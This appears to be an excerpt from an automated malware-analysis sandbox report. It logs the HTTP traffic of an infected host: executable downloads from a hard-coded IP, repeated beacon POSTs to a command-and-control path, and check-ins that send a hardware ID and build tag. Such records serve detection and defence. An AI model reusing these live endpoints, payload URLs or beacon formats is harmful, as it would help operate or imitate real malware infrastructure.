Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 10:56:44 GMTIf-None-Match: "675d646c-1b9000"
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015174001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 2d 2d 0d 0a Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build"stok------IIEBKJECFCFBFIECBKFB--
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16If-Modified-Since: Sat, 14 Dec 2024 10:55:53 GMTIf-None-Match: "675d6439-2aa400"
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 37 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015175001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 47 43 41 41 45 43 42 46 49 45 42 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------HJJEGCAAECBFIEBGHJDGContent-Disposition: form-data; name="build"stok------HJJEGCAAECBFIEBGHJDG--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 48 49 49 45 48 49 45 48 4a 4b 45 42 4b 45 48 4a 2d 2d 0d 0a Data Ascii: ------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------DHIEHIIEHIEHJKEBKEHJContent-Disposition: form-data; name="build"stok------DHIEHIIEHIEHJKEBKEHJ--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
